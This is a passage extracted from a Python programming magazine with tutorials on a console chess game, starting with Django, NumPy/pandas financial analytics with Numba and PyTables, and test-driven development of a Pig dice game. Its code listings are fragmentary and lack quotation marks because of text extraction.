The type, which can be any of Rook, Knight, Pawn, King, Queen, Bishop.
These are the only information we need to construct an instance of a chess piece. Basically the type of the
piece actually determines the rest of the properties except for the color of course which is explicitly set in
respect to which piece set the piece belongs (Listing 1).
Listing 1. Piece Class
class Piece(object):
DirectionDiagonal = False
DirectionStraight = False
DirectionGamma = False
LeapOverPiece = False
MaxSquares = 0
Color = None
Type = None
AvailableTypes = [ Rook, Knight, Pawn, King, Queen, Bishop ]
Types_Direction_Map = {
Rook
: [ straight ],
Knight : [ gamma ],
Pawn
: [ straight ],
89
}
Types_MaxSquares_Map = {
Rook
: 0,
Pawn
: 1,
King
: 1,
Queen : 0,
Bishop : 0,
Knight : -1,
}
As we can see, the constructor (__init__ method) receives the Type and Color parameters through the
**kwargs keyworded argument list (you can read more on keyworded and non-keyworded variable length
argument lists on this blog article http://www.saltycrane.com/blog/2008/01/how-to-use-args-and-kwargsin-python/).
90
The Game class is a class that contains actions that refer to the gameplay. Properties include the players,
a variable that holds a Board instance and a dictionary named Timers for storing timer info for each user.
Instantiating a Game object randomly assigns colors to users (with the randint function) and also instantiates
and sets up a board for our game. The timer display requires a helper function, the time_format method
which displays time elapsed for the current user in human readable format (MM:SS).
The way the timer works is pretty straightforward; entering the while-loop and checking if the second is
changed (https://github.com/georgepsarakis/python-chess-board/blob/master/chessboard.py#L312) it prints
the time elapsed from the start of the game for the user. Now the user needs a way of stopping the timer.
For prompting the user for input but with a timeout we are using the select function of the Python buildin select module (you can read more on this module in the manual http://docs.python.org/2/library/select.
html). We set the timeout to be one second and contents are available in the r variable. Just by hitting Enter
(https://github.com/georgepsarakis/python-chess-board/blob/master/chessboard.py#L334) the timer stops
and current time is stored in the Timers dictionary under the key of the current user.
The largest portion of game logic resides in the move_piece method. This method begins by requesting user
input; a move in our convention requires specifying the source square with the piece in chess notation and
the target square where it should move. These two positions are separated by a dash and greater than sign
characters (loosely resembling an arrow). For example B2->B3 will move the white pawn from B2 to B3.
If a user enters the string quit the game terminates.
In order to perform the move, a number of checks must be made and either the move is approved or rejected.
In the first case, the game modifies the board accordingly and starts the timer for the other player, waiting for
the next move. The following checks are performed:
Whether the piece square is actually occupied and if occupied whether whether belongs to the user.
If the move is in a straight line, a diagonal line or an L-shaped (gamma-shaped) pattern. These checks
require calculation of the absolute distance between starting and target rows and columns (https://github.
com/georgepsarakis/python-chess- board/blob/master/chessboard.py#L373 and https://github.com/
georgepsarakis/python-chess-board/blob/master/chessboard.py#L374). Straight line movement is easily
detected if the starting and target columns are the same or starting and target rows are equal; in the first case
the piece moves in a vertical line on the board otherwise in horizontal. The condition for diagonal moves is
that the absolute column and row distances must be equal. At last, L-shaped moves (valid only for Knights)
are detected if either a row or column distance is equal to 2 and the other coordinate difference is equal to 1.
So if we have a row distance of 2, then the column distance must be 1 also.
Checking if the pieces path is blocked by other pieces. This check is performed only if the
LeapOverPiece property of the moving piece is False. We must first construct the list of squares that
must be crossed by the piece in order to accomplish the move, thus we distinguish our cases in respect
to the type of movement; whether it is happening on a straight line (https://github.com/georgepsarakis/
python-chess-board/blob/master/chessboard.py#L402) or a diagonal (https://github.com/georgepsarakis/
python-chess-board/blob/master/chessboard.py#L418). L-shaped moves are performed by Knights which
incidentally can leap over pieces as well.
Having the path that outlines the move, we can first implement the check on the permitted number of
squares for this piece (https://github.com/georgepsarakis/python-chess-board/blob/master/chessboard.
py#L424).
92
Figure 1. The board with all the pieces in its initial state
93
Summary
In this tutorial we have gone through the Python code that builds a simplistic version of a chess game
between two human players. We explored some aspects of object modeling and gained some experience
on creating and interacting with Python objects. Dealing with user text input, displaying the board on the
console and displaying the timer were some of the interface difficulties while outlining the game process,
setting up the board with the pieces and validating user moves were amongst the algorithmic challenges we
faced here. Of course, this is not a complete game implementation but rather a working example; it would
definitely require much more error handling and validations, as well as incorporating all the chess rules.
Some thoughts on expanding the code can be:
Adding a --timer parameter and restrict the users game time to this number of seconds.
Keeping history of the moves and display lost pieces for each user.
Adding check and checkmate detection.
Play with computer feature (!) building a chess engine is very difficult unfortunately.
94
Whats a Framework?
A framework is a set of tools and libraries that facilitates the development of a certain type of
application. Web frameworks facilitate the development of web applications by allowing languages
like Python or Ruby to take advantage of standard methods to complete tasks like interacting with
HTTP payloads, or tracking users throughout a site, or constructing basic HTML pages. Leveraging this
scaffolding, a developer can focus on creating a web application instead of doing a deep dive on HTTP
internals and other lower-level technologies.
While the dominant web framework for the Ruby language is Rails, Python has many different web
frameworks including Bottle, web.py, and Flask with the vast majority of Python web applications being
developed right now using the mature framework Django. Django is a full-stack web framework which
includes an Object Relational Mapper (so you can use Python syntax to access values in a relational
database), a template renderer (so you can insert variables into an HTML page that will then be populated
before the page is sent to the browser), and various additional utilities like date parsers, form handlers, and
cache helpers.
Learning Django via their tutorial can be one of the easiest ways to get started with Python and really isnt
much more difficult. I advise this approach to all people new to Python and think its the best way to get going.
95
Getting Started
Before starting this tutorial, you should try to have a current version of either Mac OS X or Ubuntu Linux.
These are the easiest operating systems on which to develop for the web and the most well supported in terms
of documentation and setup guides. If you get lost, youll be much happier to be on one of these two platforms.
If youre a fan of another Linux distribution, you shouldnt have too many problems. If you want to use
Windows though, while doable, this is certainly not advised. Not all Python libraries are easily installed on
Windows and since most Python developers use OS X or Linux, youll run into fewer surprises as you go
along. If you have Windows and dont want to dual-boot your machine, get VirtualBox (https://www.virtualbox.
org/) and install Ubuntu 13.04 inside a virtual machine. The software is free and widely used and running
Ubuntu, inside of Windows, is one of the most common scenarios for Virtual Box.
And Django?
Once Python and pip are installed, you can look at the Python Package Index for all the different packages
available to install. Installing Django from here is as easy as typing pip install Django into the terminal.
More information can be found in the docs (https://docs.djangoproject.com/en/1.5/topics/install/), but
installing via pip should work just fine.
96
Final Thoughts
The above information is not meant to be all en-compassing, but hopefully provides some basic information
and background on getting started with Python and the Django Tutorial. Often the best resource for getting
further into online tutorials is experimenting with project related tasks and peer advice for when you get
stuck. Having an easily accessed community of support at your fingertips is also one of the best things about
Python by far and you should feel free to post comments and questions to... at...
Lastly, for any new or longtime Python enthusiasts, Im happy to respond to emails, IMs and coffees if you
ever make it to Nairobi.
Hopefully you now have a background on how to get started with Python with the Django tutorial. So, get to
it and write in with any questions you have so we can help you out.
97
The data and financial analytics environment has changed dramatically over the last years and it is still
changing at a fast pace. Among the major trends to be observed are:
big data: be it in terms of volume, complexity or velocity, available data is growing drastically; new
technologies, an increasingly connected world, more sophisticated data gathering techniques and devices
as well as new cultural attitudes towards social media are among the drivers of this trend
real-time economy: today, decisions have to be made in real-time, business strategies are much shorter
lived and the need to cope faster with the ever increasing amount and complexity of decision-relevant data
steadily increases
Decision makers and analysts being faced with such an environment cannot rely anymore on traditional
approaches to process data or to make decisions. In the past, these areas were characterized by highly
structured processes which were repeated regularly or when needed.
For example, on the data processing side, it was and it is still quite common to transfer operational data
into separate data warehouses for analytics purposes by executing weekly or monthly batch processes.
Similarly, with regard to decision making, having time consuming, yearly strategy and budgeting
processes seems still common practice among the majority of larger companies.
While these approaches might still be valid for certain industries, big data and the real-time economy
demand for much more agile and interactive data analytics and decision making. One extreme example
illustrating this is high-frequency trading of financial securities where data has to be analyzed on a massive
scale and decisions have to be made sometimes in milliseconds. This is only possible by making use of
high performance technology and by applying automated, algorithmic decision processes. While this might
seem extreme for most other business areas, the need for more interactive analytics and faster decisions has
become a quite common phenomenon.
98
99
100
where z is a standard normally distributed random variable and it holds 0<t T with T the final time horizon
(For details, refer to the book Hilpisch, Yves (2013): Derivatives Analytics with Python. Visixion GmbH,
http://www.visixion.com).
To get mathematically reliable results, a high number I of simulated stock price paths in combination with a
fine enough time grid is generally needed. This makes the Monte Carlo simulation approach rather compute
intensive. For one million stock price paths with 50 time intervals each, this leads to 50 million single
computations, each involving exponentiation, square roots and the draw of a (pseudo-)random number. The
following is a pure Python implementation of the respective simulation algorithm, making heavy use of
lists and for-loops (Listing 1).
Listing 1. Monte Carlo Simulation: Pure Python Code
#
# Simulating Geometric Brownian Motion with Python
#
from time import time
from math import exp, sqrt, log
from random import gauss
t0 = time()
# Parameters
S0 = 100; r = 0.05; sigma = 0.2
T = 1.0; M = 50; dt = T / M; I = 1000000
# Simulating I paths with M time steps
S = []
for i in range(I):
path = []
for t in range(M + 1):
if t == 0:
path.append(S0)
else:
z = gauss(0.0, 1.0)
St = path[t-1] * exp((r - 0.5 * sigma ** 2) * dt
+ sigma * sqrt(dt) * z)
path.append(St)
S.append(path)
# Calculating the absolute log return
av = sum([path[-1] for path in S]) / I
print Absolute Log Return %7.3f % log(av / S0)
print Duration in Seconds %7.3f % (time() - t0)
The absolute log return over one year is correct with 5%, so the discretization obviously works well. The
execution takes almost 2 minutes in this case.
Although the Monte Carlo simulation is quite easily implemented in pure Python, NumPy is usually
designed to handle such operations. To this end, note that our end product S is a list of one million lists with
51 entries each. This can be seen as a matrix or a rectangular array of size 1,000,000 x 51. And NumPys
major strength is to process data structures of this kind.
101
0.050
5.046
102
This code has almost identical execution speed as the previous NumPy version but is obviously even more
compact. As a matter of software design and also taste, it could be even a little bit too concise when it comes
to readability and maintenance.
No matter which approach is used, matplotlib helps with the convenient visualization of the simulation
results. The following code, plots the first 10 simulated paths from the NumPy array S and also the average
over time over all one million paths (Listing 4).
Listing 4. Monte Carlo Simulation: Code to Generate Plot
#
# Plotting 10 Stock Price Paths + Average
#
import matplotlib.pyplot as plt
plt.plot(S[:, :10])
plt.plot(np.sum(S, axis=1) / I, r, lw=2.0)
plt.grid(True)
plt.title(Stock Price Paths)
plt.show()
The result from this code is shown in Figure 1 with the thicker red line being the average over all paths.
Figure 1. 10 simulated stock price paths and the average over all paths (red line)
103
The analysis was implemented on 03.August 2013 and the starting date is chosen to get about five years
of stock price data. GOOG and AAPL are now pandas DataFrame objects that contain a time index and a
number of different time series. Lets have a look at the five most recent records of the Google data:
In:
GOOG.tail()
Out:
Date
Open
High
Low
Close
Volume
Adj Close
2013-07-29
884.90
894.82
880.89
882.27
1891900
882.27
2013-07-30
885.46
895.61
880.87
890.92
1755600
890.92
2013-07-31
892.99
896.51
886.18
887.75
2072900
887.75
2013-08-01
895.00
904.55
895.00
904.22
2124500
904.22
2013-08-02
903.44
907.00
900.82
906.57
1713900
906.57
We are only interested in the Close data of both stocks, so we generate a third DataFrame, using the
respective columns of the other DataFrame objects. We can do this by calling the DataFrame function
and providing a dictionary specifying what we want from the other two objects. The time series are both
normalized to start at 100 while the time index is automatically inferred from the input.
In:
DATA = pd.DataFrame({AAPL : AAPL[Close] / AAPL[Close].ix[0],
GOOG : GOOG[Close] / GOOG[Close].ix[0]}) * 100
DATA.head()
Out:
Date
AAPL
GOOG
2008-07-28
100.000000
100.000000
2008-07-29
101.735751
101.255449
2008-07-30
103.549223
101.169517
2008-07-31
102.946891
99.293679
2008-08-01
101.463731
98.059188
Calling the plot method of the DataFrame class generates a plot of the time series data.
In:
DATA.plot()
104
Figure 2. Apple and Google stock prices since 28. July 2008 until 02. August 2013; both
time series normalized to start at 100
It is a stylized fact, that prices of technology stocks are highly positively correlated. This means, roughly
speaking, that they tend to perform in tandem: when the price of one stock rises (falls) the other stock price
is likely to rise (fall) as well. To analyze, if this is the case with Apple and Google stocks, we first add log
return columns to our DataFrame.
In:
DATA[AR] = np.log(DATA[AAPL] / DATA[AAPL].shift(1))
DATA[GR] = np.log(DATA[GOOG] / DATA[GOOG].shift(1))
DATA.tail()
Out:
Date
AAPL
GOOG
AR
GR
2013-07-29
290.019430
184.915744
0.015302
-0.003485
2013-07-30
293.601036
186.728706
0.012274
0.009757
2013-07-31
293.089378
186.064302
-0.001744
-0.003564
2013-08-01
295.777202
189.516264
0.009129
0.018383
2013-08-02
299.572539
190.008803
0.012750
0.002596
We Next want to implement an ordinary least regression (OLS) analysis (Listing 5).
105
0.3578
0.3573
Rmse:
0.0179
1263
2
702.6634, p-value:
0.0000
Listing 6. Scatter plot of the returns and the resulting linear regression line
In:
import matplotlib.pyplot as plt
plt.plot(DATA[GR], DATA[AR], b.)
x = np.linspace(plt.axis()[0], plt.axis()[1] + 0.01)
plt.plot(x, model.beta[1] + model.beta[0] * x, r, lw=2)
plt.grid(True); plt.axis(tight)
plt.xlabel(Google Stock Returns); plt.ylabel(Apple Stock Returns)
Obviously, there is indeed a high positive correlation of +0.67 between the two stock prices. This is readily
illustrated by a scatter plot of the returns and the resulting linear regression line (Listing 6). Figure 3 shows
the resulting output of this code. All in all, we need about 10 lines of code to retrieve five years of stock
price data for two stocks, to plot this data, to calculate and add the daily log returns for both stocks and to
conduct a least squares regression. Some additional lines of code yield a custom scatter plot of the return
data plus the linear regression line. This illustrates that Python in combination with pandas is highly efficient
when it comes to interactive financial analytics. In addition, through the high level programming model
the technical skills an analyst needs are reduced to a minimum. As a rule of thumb, one can say that every
analytical question and/or analytics step can be translated to one or two lines of Python/pandas code.
106
Figure 3. Scatter plot of Google and Apple stock price returns from 28. July 2008 until
02. August 2013; red line is the OLS regression result with y = 0.005 + 0.67 x
Just-in-Time Compiling
A number of typical analytics algorithms demand for a large number of iterations over data sets which then
results in (nested) loop structures. The Monte Carlo algorithm is an example for this. In that case, using
NumPy and avoiding loops on the Python level yields a significant increase in execution speed. NumPy
is really strong when it comes to fully populated matrices/arrays of rectangular form. However, not all
algorithms can be beneficially casted to such a structural set-up.
We illustrate the use of the just-in-time compiler Numba (http://numba.pydata.org) to speed up pure Python
code through an interactive IPython session.
The following is an example function with a nested loop structure where the inner loop increases in
multiplicative fashion with the outer loop.
In:
import math
def f(n):
iter = 0.0
for i in range(n):
for j in range(n * i):
iter += math.sin(pi / 2)
return int(iter)
It returns the number of iterations, with the counting being made a bit more compute intensive than usual.
Lets measure execution speed for this function by using the IPython magic function %time.
In:
n = 400
%time f(n)
107
32 million loops take about 75 seconds to execute. Lets see what we can get from just-in-time compiling
with Numba.
In:
import numba as nb
f_nb = nb.autojit(f)
Two lines of code suffice to compile the pure Python function into a Python-callable compiled C function.
In:
n = 400
%time f_nb(n)
Out:
CPU times: user 41 ms, sys: 0 ns, total: 41 ms
Wall time: 40.2 ms
31920000L
This time, the same number of loops only takes 40 milliseconds to execute. A speed-up of almost 1,900
times. The remarkable aspects are that this speed-up is reached by two additional lines of code only and that
no changes to the Python function are necessary.
Although this algorithm could in principle be implemented using standard NumPy arrays, the array would
have to be of shape 16,000 x 16,000 or approximately 2 GB of size. In addition, due to the very nature of
the nested loop there would not be much potential to vectorize it. In addition, operating with higher n would
maybe lead to a too high memory demand.
In:
n = 1500
%time f_nb(n)
Out:
CPU times: user 2.13 s, sys: 0 ns, total: 2.13 s
Wall time: 2.13 s
1686375000L
For n = 1,500 the algorithm loops more than 1.6 billion times with the last inner loop looping 1,499 x 1,499
= 2,247,001 times. With this parametrization, the typical NumPy approach is not applicable anymore.
However, the Numba compiled function does the job in a little bit more than 2 seconds.
In summary, we can say the following:
code: two lines of code suffice to generate a compiled version of a loop-heavy pure Python algorithm
speed: execution speed of the Numba-compiled function is about 1,900 times faster than pure Python
memory: Numba preserves the memory efficiency of the algorithm since it only needs to store a single floating
point number and not a large array of floats
108
Out-of-Memory Operations
Just-in-time compiling obviously helps to implement custom algorithms that are fast and memory efficient.
However, there are general data sets that exceed available memory, like large arrays which might grow over
time, and on which one has to implement numerical operations resulting into output that again might exceed
available memory.
The library PyTables, which is based on the HDF5 standard (http://www.hdfgroup.org/HDF5/), offers a number
of routes to implement out-of-memory calculations.
Suppose you have a computing node with 512 MB of RAM, like with a free account of Wakari. Assume
further that you have an array called ear which is of 700 MB size or larger. On this array, you might want to
calculate the Python expression
3 * sin(ear) + abs(ear) ** 0.5
Using pure NumPy would lead to four temporary arrays of the size of ear and of an additional result array of
the same size. This is all but memory efficient. The library numexpr (https://code.google.com/p/numexpr/)
resolves this problem by optimizing, parallelizing and compiling numerical expressions like these and
avoiding temporary arrays leading to significant speed-ups in general and much better use of memory.
However, in this case it does not solve the problem since even the input array does not fit into the memory.
PyTables offers a solution through the Expr module which is similar in spirit to numexpr but works with
disk-based arrays. Lets have a look at a respective IPython session:
In:
import numpy as np
import tables as tb
h5 = tb.openFile(data.h5, w)
This opens a PyTables/HDF5 database where we can store our example data.
In:
n = 600
ear = h5.createEArray(h5.root, ear, atom=tb.Float64Atom(), shape=(0, n))
This creates a disk-based array with name ear that is expandable in the first dimension and has fixed width of
600 in the second dimension.
In:
rand = np.random.standard_normal((n, n))
for i in range(250):
ear.append(rand)
ear.flush()
This populates the disk-based array with (pseudo-)random numbers. We do it via looping to generate an
array which is larger than the memory size.
In:
ear
Out:
/ear (EArray(150000, 600))
atom := Float64Atom(shape=(), dflt=0.0)
maindim := 0
flavor := numpy
byteorder := little
chunkshape := (13, 600)
109
The array has a size of more than 700 MB. We need a disk-based results store for our numerical calculation
since it does not fit in the memory of 512 MB either.
In:
out = h5.createEArray(h5.root, out, atom=tb.Float64Atom(), shape=(0, n))
Now, we can use the Expr module to evaluate the numerical expression from above: Listing 7.
Listing 7. Expr module to evaluate the numerical expressio
In:
expr = tb.Expr(3 * sin(ear) + abs(ear) ** 0.5)
expr.setOutput(out, append_mode=True)
%time expr.eval()
Out:
CPU times: user 2.29 s, sys: 1.51 s, total: 3.8 s
Wall time: 34.6 s
/out (EArray(150000, 600))
atom := Float64Atom(shape=(), dflt=0.0)
maindim := 0
flavor := numpy
byteorder := little
chunkshape := (13, 600)
This code calculates the expression and writes the result in the out array on disk. This means that doing all
the calculations plus writing 700+ MB of output takes about 35 seconds in this case. This might seem not too
fast, but it made possible a calculation which was impossible on the given hardware beforehand.
Finally, you should close your database.
In:
h5.close()
The example illustrates that PyTables allows the implementation of an array operation which would at least
involve 1.4 GB of RAM by using NumPy and numexpr on a machine with 512 MB RAM only.
110
Now, the whole data set is in the memory and can be processed there.
In:
import numexpr as ne
%time res = ne.evaluate(3 * sin(arr) + abs(arr) ** 0.5)
Out:
CPU times: user 6.37 s, sys: 264 ms, total: 6.64 s
Wall time: 881 ms
112
113
game.py
test_game.py
Both files are currently empty. To get started, lets add an empty test case to test_game.py to prepare for our
game of Pig: Listing 1.
Listing 1. An empty TestCase subclass
from unittest import TestCase
class GameTest(TestCase):
pass
We simply instantiate a new Pig game with some player names. Next, we check to see if were able to get an
expected value out of the game. As mentioned earlier, we can describe our expectations using assertionswe
assert that certain conditions are met. In this case, were asserting equality with TestCase.assertEqual. We
want the players who start a game of Pig to equal the same players returned by Pig.get_players. The TDD
steps suggest that we should now run our test suite and see what happens.
To do that, run the following command from your project directory:
python -m unittest
It should detect that the test_game.py file has a unittest.TestCase subclass in it and automatically run any
tests within the file. Your output should be similar to this: Listing 3.
Listing 3. Running our first test
E
====================================================
ERROR: test_join (test_game.GameTest)
Players may join a game of Pig
---------------------------------------------------Traceback (most recent call last):
File ./test_game.py, line 11, in test_join
pig = game.Pig(PlayerA, PlayerB, PlayerC)
AttributeError: module object has no attribute Pig
---------------------------------------------------Ran 1 test in 0.000s
FAILED (errors=1)
We had an error! The E on the first line of output indicates that a test method had some sort of Python error.
This is obviously a failed test, but theres a little more to it than just our assertion failing. Looking at the
output a bit more closely, youll notice that its telling us that our game module has no attribute Pig. This
means that our game.py file doesnt have the class that we tried to instantiate for the game of Pig.
115
Much better. Now we see F on the first line of output, which is what we want at this point. This indicates that
we have a failing test method, or that one of the assertions within the test method did not pass. Inspecting the
additional output, we see that we have an AssertionError. The return value of our Pig.get_players method is
currently None, but we expect the return value to be a tuple with player names. Now, following with the TDD
process, we need to satisfy this test. No more, no less (Listing 6). And we need to verify that weve satisfied
the test: Listing 7.
Listing 6. Implementing code to satisfy the test
class Pig:
def __init__(self, *players):
self.players = players
def get_players(self):
Returns a tuple of all players
return self.players
116
Excellent! The dot (.) on the first line of output indicates that our test method passed. The return value of
Pig.get_players is exactly what we want it to be. We now have a high level of confidence that players may
join a game of Pig, and we will quickly know if that stops working at some point in the future. Theres
nothing more to do with this particular part of the game right now. Weve satisfied our basic requirement.
Lets move on to another part of the game.
Since were relying on random numbers, we test the result of the roll method repeatedly. Our assertions
all happen within the loop because its important that we always get an integer value from a roll and that the
value is within our range of one to six. Its not bulletproof, but it should give us a fair level of confidence
anyway. Dont forget to stub out the new Pig.roll method so our test fails instead of errors out (Listing 9 and
listing 10).
Listing 9. Stub of our new Pig.roll method
def roll(self):
Return a number between 1 and 6
pass
117
Lets check the output. There is a new F on the first line of output. For each test method in our test suite,
we should expect to see some indication that the respective methods are executed. So far weve seen three
common indicators:
E, which indicates that a test method ran but had a Python error,
F, which indicates that a test method ran but one of our assertions within that method failed,
., which indicates that a test method ran and that all assertions passed successfully.
There are other indicators, but these are the three well deal with for the time being. The next TDD step is to
satisfy the test weve just written. We can use Pythons built-in random library to make short work of this new
Pig.roll method (Listing 11 and Listing 12).
Listing 11. Implementing the roll of a die
import random
def roll(self):
Return a number between 1 and 6
return random.randint(1, 6)
Checking Scores
Players might want to check their score mid-game, so lets add a test to make sure thats possible. Again,
dont forget to stub out the new Pig.get_scores method (Listing 13 and Listing 14).
118
Note that ordering in dictionaries is not guaranteed, so your keys might not be printed out in the same order
that you typed them in your code. And now to satisfy the test (Listing 15 and Figure 16).
Listing 15. First implementation for default scores
def __init__(self, *players):
self.players = players
self.scores = {}
for player in self.players:
self.scores[player] = 0
def get_score(self):
Return the score for all players
return self.scores
The test has been satisfied. We can move on to another piece of code now if wed like, but lets remember
the fifth step from our TDD process. Lets try refactoring some code that we already know is working and
make sure our assertions still pass.
119
The fact that our test still passes illustrates a few very important concepts to understand about valuable
automated testing. The most useful unit tests will treat the production code as a black box. We dont want
to test implementation. Rather, we want to test the output of a unit of code given a known input.
Testing the internal implementation of a function or method leads to trouble. In our case, we found a way
to leverage functionality built into Python to refactor our code. The end result is the same. Had we tested
the specific low-level implementation of our Pig.get_score definition, the test could have easily broken after
refactoring despite the code still ultimately doing what we want.
The idea of validating the output of a of code when given known input encourages another valuable
practice. It stimulates the desire to design our code with more single-purpose functions and methods. It also
discourages the inclusion of side effects.
In this context, side effects can mean that were changing internal variables or state which could influence
the behavior of other units of code. If we only deal with input values and return values, its very easy
to reason about the behavior of our code. Side effects are not always bad, but they can introduce some
interesting conditions at runtime that are difficult to reproduce for automated testing.
Its much easier to confidently test smaller, single-purpose units of code than it is to test massive blocks of
code. We can achieve more complex behavior by chaining together the smaller units of code, and we can
have a high level of confidence in these compositions because we know the underlying units meet
our expectations.
120
The mock library is extremely powerful, but it can take a while to get used to. Here were using it to mock
the return value of multiple calls to Pythons built-in input function through mocks side_effect feature. When
you specify a list as the side effect of a mocked object, youre specifying the return value for each call to
that mocked object. For each call to input, the first value will be removed from the list and used as the return
value of the call.
In our code the first call to input will consume and return A, leaving [M, Z, ] as the remaining return
values. We add an additional empty value as a side effect to signal when were done entering player names.
And we dont expect the empty value to appear as a player name.
Note that if you supply fewer return values in the side_effect list than you have calls to the mocked object,
the code will raise a StopIteration exception. Say, for example, that you set the side_effect to [1] but that you
called input twice in the code. The first time you call input, youd get the 1 back. The second time you call
input, it would raise the exception, indicating that our side_effect list has nothing more to return.
Were able to use this mocked input function through whats called a context manager. That is the block that
begins with the keyword with. A context manager basically handles the setup and teardown for the block of
code it contains. In this example, the mock.patch context manager will handle the temporary patching of the
built-in input function while we run game.get_player_names().
After the code in the with block has been executed, the context manager will roll back the input function to its
original, built-in state. This is very important, particularly if the code in the with block raises some sort of error.
Even in conditions such as these, the changes to the input function will be reverted, allowing other code that
may depend on inputs (or whatever object we have mocked) original functionality to proceed as expected.
Lets run the test suite to make sure our new test fails (Listing 22). Well that was easy! Heres a possible way
to satisfy this test: Listing 23 and Listing 24.
121
Would you look at that?! Were able to test user input without slowing down our tests much at all!
Notice, however, that we have passed a parameter to the input function. This is the prompt that appears on
the screen when the program asks for player names. Lets say we want to make sure that its actually printing
out what we expect it to print out (Listing 25).
Listing 25. Test that the correct prompt appears on screen
def test_get_player_names_stdout(self):
Check the prompts for player names
with mock.patch(builtins.input, side_effect=[A, B, ]) as fake:
game.get_player_names()
fake.assert_has_calls([
mock.call(Player 1s name: ),
mock.call(Player 2s name: ),
mock.call(Player 3s name: )
])
122
Perfect. It works as we expect it to. One thing to take away from this example is that there does not need to
be a one-to-one ratio of test methods to actual pieces of code. Right now weve got two test methods for the
very same get_player_names function. It is often good to have multiple test methods for a single unit of code if
that code may behave differently under various conditions.
Also note that we didnt exactly follow the TDD process for this last test. The code for which we wrote
the test had already been implemented to satisfy an earlier test. It is acceptable to veer away from the TDD
process, particularly if we want to validate assumptions that have been made along the way. When we
implemented the original get_player_names function, we assumed that the prompt would look the way we
wanted it to look. Our latest test simply proves that our assumptions were correct. And now we will be able
to quickly detect if the prompt begins misbehaving at some point in the future.
To Hold or To Roll
Now its time to write a test for different branches of code for when a player chooses to hold or roll again.
We want to make sure that our roll_or_hold method will only return roll or hold and that it wont error out
with invalid input (Listing 27).
Listing 27. Player can choose to roll or hold
@mock.patch(builtins.input)
def test_roll_or_hold(self, fake_input):
Player can choose to roll or hold
fake_input.side_effect = [R, H, h, z, 12345, r]
pig = game.Pig(PlayerA, PlayerB)
self.assertEqual(pig.roll_or_hold(),
self.assertEqual(pig.roll_or_hold(),
self.assertEqual(pig.roll_or_hold(),
self.assertEqual(pig.roll_or_hold(),
roll)
hold)
hold)
roll)
This example shows yet another option that we have for mocking objects. Weve decorated the test_
roll_or_hold method with @mock.patch(builtins.input). When we use this option, we basically turn the
entire contents of the method into the block within a context manager. The builtins.input function will be a
mocked object throughout the entire method.
123
And to satisfy our new test, we could use something like this: Listing 29. Run the test suite (Listing 30). We know
that our new code works. Even better than that, we know that we havent broken any existing functionality.
124
Refactoring Tests
Since were doing so much with user input, lets take a few minutes to refactor our tests to use a common
mock for the built-in input function before proceeding with our testing (Listing 31).
A lot has changed in our tests code-wise, but the behavior should be exactly the same as before. Lets review
the changes (Listing 32).
We have defined a global mock.Mock instance called INPUT. This will be the variable that we use in place of the
various uses of mocked input. We are also using mock.patch as a class decorator now, which will allow all test
methods within the class to access the mocked input function through our INPUT global.
This decorator is a bit different from the one we used earlier. Instead of allowing a mock.Mock object to be
implicitly created for us, were specifying our own instance. The value in this solution is that you dont have
to modify the method signatures for each test method to accept the mocked input function. Instead, any test
method that needs to access the mock may use the INPUT global (Listing 33).
Listing 31. Refactoring test code
from unittest import TestCase, mock
import game
INPUT = mock.Mock()
@mock.patch(builtins.input, INPUT)
class GameTest(TestCase):
def setUp(self):
INPUT.reset_mock()
def test_join(self):
Players may join a game of Pig
pig = game.Pig(PlayerA, PlayerB, PlayerC)
self.assertEqual(pig.get_players(), (PlayerA, PlayerB, PlayerC))
def test_roll(self):
A roll of the die results in an integer between 1 and 6
pig = game.Pig(PlayerA, PlayerB)
for i in range(500):
r = pig.roll()
self.assertIsInstance(r, int)
self.assertTrue(1 <= r <= 6)
def test_scores(self):
Player scores can be retrieved
pig = game.Pig(PlayerA, PlayerB, PlayerC)
self.assertEqual(
pig.get_score(),
{
PlayerA: 0,
PlayerB: 0,
PlayerC: 0
}
125
roll)
hold)
hold)
roll)
Weve added a setUp method to our class. This method name has a special meaning when used with Pythons
unittest library. The setUp method will be executed before each and every test method within the class. Theres
a similar special method called tearDown that is executed after each and every test method within the class.
These methods are useful for getting things into a state such that our tests will run successfully or cleaning
up after our tests. Were using the setUp method to reset our mocked input function. This means that any calls
or side effects from one test method are removed from the mock, leaving it in a pristine state at the start of
each test (Listing 34).
The test_get_player_names test method no longer defines its own mock object. The context manager is also
not necessary anymore, since the entire method is effectively executed within a context manager because
126
roll)
hold)
hold)
roll)
Finally, our test_roll_or_hold test method no longer has its own decorator. Also note that the additional
parameter to the method is no longer necessary. When you find that you are mocking the same thing in many
different test methods, as we were doing with the input function, a refactor like what weve just done can be
a good idea. Your test code becomes much cleaner and more consistent. As your test suite continues to grow,
just like with any code, you need to be able to maintain it. Abstracting out common code, both in your tests
and in your production code, early on will help you and others to maintain and understand the code.
Now that weve reviewed the changes, lets verify that our tests havent broken (Listing 36). Wonderful. All
is well with our refactored tests.
Listing 36. Refactoring has not broken our tests
......
-----------------------------------------------------Ran 6 tests in 0.005s
OK
127
# roll or hold
r, r,
r, r, r, h,
r, r, r, h,
# George
# Bob
# George
pig = game.Pig(*game.get_player_names())
pig.roll = mock.Mock(side_effect=[
6, 6, 1,
# George
6, 6, 6, 6,
# Bob
5, 4, 3, 2,
# George
])
self.assertRaises(StopIteration, pig.play)
self.assertEqual(
pig.get_score(),
{
George: 14,
Bob: 24
}
)
Instead of monkey patching the Pig.roll method, we could have mocked the random.randint function.
However, doing so would be walking the fine and dangerous line of relying on the underlying
implementation of our Pig.roll method. If we ever changed our algorithm for rolling a die and our tests
mocked random.randint, our test would likely fail.
Our first course of action is to specify the values that we want to have returned from both of these mocked
functions. For our input, well start with prompting for player names and also include some roll or hold
responses. Next we instantiate a Pig game and define some not-so-random values that the players will roll.
All we are interested in checking for now is that players each take turns rolling and that their scores are
adjusted according to the rules of the game. We dont need to worry just yet about a player winning when
they earn 100 or more points.
128
Marvelous, the test fails, exactly as we wanted it to. Lets fix that by implementing our game (Listing 39).
So the core of any game is that all players take turns. We will use Pythons built-in itertools library to make
that easy. This library has a cycle function, which will continue to return the same values over and over.
129
130
^^
Lets fix the broken scores problem first. Notice that George has many more points than we expected he
ended up with 26 points instead of the 14 that he should have earned. This suggests that he still earned points
for a turn when he shouldnt have. Lets inspect that block of code: Listing 41.
Ah hah! We display that the player loses their turn points when they roll a one, but we dont actually have
code to do that. Lets fix that: Listing 42. Now to verify that this fixes the problem (Listing 43).
Listing 42. The solution
if value == 1:
print({} rolled a 1 and lost {} points.format(player, turn_points))
turn_points = 0
break
131
Alternatively, if we dont care to make any assertions about what is printed to the screen, we can use a
decorator such as:
